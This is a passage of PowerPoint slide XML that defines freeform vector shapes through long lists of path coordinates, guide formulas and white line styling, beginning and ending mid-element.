                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="40"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36087" name="Freeform 220"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1566" y="2862"/>
                <a:ext cx="619" cy="652"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 307 w 619"/>
                  <a:gd name="T1" fmla="*/ 471 h 652"/>
                  <a:gd name="T2" fmla="*/ 273 w 619"/>
                  <a:gd name="T3" fmla="*/ 444 h 652"/>
                  <a:gd name="T4" fmla="*/ 253 w 619"/>
                  <a:gd name="T5" fmla="*/ 410 h 652"/>
                  <a:gd name="T6" fmla="*/ 255 w 619"/>
                  <a:gd name="T7" fmla="*/ 363 h 652"/>
                  <a:gd name="T8" fmla="*/ 221 w 619"/>
                  <a:gd name="T9" fmla="*/ 344 h 652"/>
                  <a:gd name="T10" fmla="*/ 208 w 619"/>
                  <a:gd name="T11" fmla="*/ 300 h 652"/>
                  <a:gd name="T12" fmla="*/ 173 w 619"/>
                  <a:gd name="T13" fmla="*/ 285 h 652"/>
                  <a:gd name="T14" fmla="*/ 136 w 619"/>
                  <a:gd name="T15" fmla="*/ 258 h 652"/>
                  <a:gd name="T16" fmla="*/ 102 w 619"/>
                  <a:gd name="T17" fmla="*/ 251 h 652"/>
                  <a:gd name="T18" fmla="*/ 60 w 619"/>
                  <a:gd name="T19" fmla="*/ 257 h 652"/>
                  <a:gd name="T20" fmla="*/ 41 w 619"/>
                  <a:gd name="T21" fmla="*/ 241 h 652"/>
                  <a:gd name="T22" fmla="*/ 15 w 619"/>
                  <a:gd name="T23" fmla="*/ 224 h 652"/>
                  <a:gd name="T24" fmla="*/ 12 w 619"/>
                  <a:gd name="T25" fmla="*/ 178 h 652"/>
                  <a:gd name="T26" fmla="*/ 51 w 619"/>
                  <a:gd name="T27" fmla="*/ 150 h 652"/>
                  <a:gd name="T28" fmla="*/ 73 w 619"/>
                  <a:gd name="T29" fmla="*/ 102 h 652"/>
                  <a:gd name="T30" fmla="*/ 63 w 619"/>
                  <a:gd name="T31" fmla="*/ 74 h 652"/>
                  <a:gd name="T32" fmla="*/ 66 w 619"/>
                  <a:gd name="T33" fmla="*/ 65 h 652"/>
                  <a:gd name="T34" fmla="*/ 108 w 619"/>
                  <a:gd name="T35" fmla="*/ 50 h 652"/>
                  <a:gd name="T36" fmla="*/ 132 w 619"/>
                  <a:gd name="T37" fmla="*/ 66 h 652"/>
                  <a:gd name="T38" fmla="*/ 158 w 619"/>
                  <a:gd name="T39" fmla="*/ 53 h 652"/>
                  <a:gd name="T40" fmla="*/ 157 w 619"/>
                  <a:gd name="T41" fmla="*/ 38 h 652"/>
                  <a:gd name="T42" fmla="*/ 169 w 619"/>
                  <a:gd name="T43" fmla="*/ 20 h 652"/>
                  <a:gd name="T44" fmla="*/ 208 w 619"/>
                  <a:gd name="T45" fmla="*/ 8 h 652"/>
                  <a:gd name="T46" fmla="*/ 220 w 619"/>
                  <a:gd name="T47" fmla="*/ 11 h 652"/>
                  <a:gd name="T48" fmla="*/ 226 w 619"/>
                  <a:gd name="T49" fmla="*/ 47 h 652"/>
                  <a:gd name="T50" fmla="*/ 260 w 619"/>
                  <a:gd name="T51" fmla="*/ 55 h 652"/>
                  <a:gd name="T52" fmla="*/ 291 w 619"/>
                  <a:gd name="T53" fmla="*/ 44 h 652"/>
                  <a:gd name="T54" fmla="*/ 330 w 619"/>
                  <a:gd name="T55" fmla="*/ 48 h 652"/>
                  <a:gd name="T56" fmla="*/ 359 w 619"/>
                  <a:gd name="T57" fmla="*/ 14 h 652"/>
                  <a:gd name="T58" fmla="*/ 382 w 619"/>
                  <a:gd name="T59" fmla="*/ 57 h 652"/>
                  <a:gd name="T60" fmla="*/ 356 w 619"/>
                  <a:gd name="T61" fmla="*/ 88 h 652"/>
                  <a:gd name="T62" fmla="*/ 366 w 619"/>
                  <a:gd name="T63" fmla="*/ 106 h 652"/>
                  <a:gd name="T64" fmla="*/ 392 w 619"/>
                  <a:gd name="T65" fmla="*/ 115 h 652"/>
                  <a:gd name="T66" fmla="*/ 424 w 619"/>
                  <a:gd name="T67" fmla="*/ 92 h 652"/>
                  <a:gd name="T68" fmla="*/ 455 w 619"/>
                  <a:gd name="T69" fmla="*/ 109 h 652"/>
                  <a:gd name="T70" fmla="*/ 464 w 619"/>
                  <a:gd name="T71" fmla="*/ 129 h 652"/>
                  <a:gd name="T72" fmla="*/ 501 w 619"/>
                  <a:gd name="T73" fmla="*/ 126 h 652"/>
                  <a:gd name="T74" fmla="*/ 548 w 619"/>
                  <a:gd name="T75" fmla="*/ 132 h 652"/>
                  <a:gd name="T76" fmla="*/ 601 w 619"/>
                  <a:gd name="T77" fmla="*/ 163 h 652"/>
                  <a:gd name="T78" fmla="*/ 618 w 619"/>
                  <a:gd name="T79" fmla="*/ 213 h 652"/>
                  <a:gd name="T80" fmla="*/ 580 w 619"/>
                  <a:gd name="T81" fmla="*/ 262 h 652"/>
                  <a:gd name="T82" fmla="*/ 557 w 619"/>
                  <a:gd name="T83" fmla="*/ 283 h 652"/>
                  <a:gd name="T84" fmla="*/ 552 w 619"/>
                  <a:gd name="T85" fmla="*/ 367 h 652"/>
                  <a:gd name="T86" fmla="*/ 536 w 619"/>
                  <a:gd name="T87" fmla="*/ 404 h 652"/>
                  <a:gd name="T88" fmla="*/ 507 w 619"/>
                  <a:gd name="T89" fmla="*/ 452 h 652"/>
                  <a:gd name="T90" fmla="*/ 466 w 619"/>
                  <a:gd name="T91" fmla="*/ 456 h 652"/>
                  <a:gd name="T92" fmla="*/ 427 w 619"/>
                  <a:gd name="T93" fmla="*/ 481 h 652"/>
                  <a:gd name="T94" fmla="*/ 402 w 619"/>
                  <a:gd name="T95" fmla="*/ 502 h 652"/>
                  <a:gd name="T96" fmla="*/ 402 w 619"/>
                  <a:gd name="T97" fmla="*/ 541 h 652"/>
                  <a:gd name="T98" fmla="*/ 372 w 619"/>
                  <a:gd name="T99" fmla="*/ 594 h 652"/>
                  <a:gd name="T100" fmla="*/ 368 w 619"/>
                  <a:gd name="T101" fmla="*/ 587 h 652"/>
                  <a:gd name="T102" fmla="*/ 346 w 619"/>
                  <a:gd name="T103" fmla="*/ 612 h 652"/>
                  <a:gd name="T104" fmla="*/ 328 w 619"/>
                  <a:gd name="T105" fmla="*/ 634 h 652"/>
                  <a:gd name="T106" fmla="*/ 299 w 619"/>
                  <a:gd name="T107" fmla="*/ 606 h 652"/>
                  <a:gd name="T108" fmla="*/ 273 w 619"/>
                  <a:gd name="T109" fmla="*/ 584 h 652"/>
                  <a:gd name="T110" fmla="*/ 304 w 619"/>
                  <a:gd name="T111" fmla="*/ 538 h 652"/>
                  <a:gd name="T112" fmla="*/ 376 w 619"/>
                  <a:gd name="T113" fmla="*/ 109 h 652"/>
                  <a:gd name="T114" fmla="*/ 377 w 619"/>
                  <a:gd name="T115" fmla="*/ 85 h 652"/>
                  <a:gd name="T116" fmla="*/ 401 w 619"/>
                  <a:gd name="T117" fmla="*/ 98 h 652"/>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619"/>
                  <a:gd name="T178" fmla="*/ 0 h 652"/>
                  <a:gd name="T179" fmla="*/ 619 w 619"/>
                  <a:gd name="T180" fmla="*/ 652 h 652"/>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619" h="652">
                    <a:moveTo>
                      <a:pt x="307" y="504"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="306" y="500"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="475"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
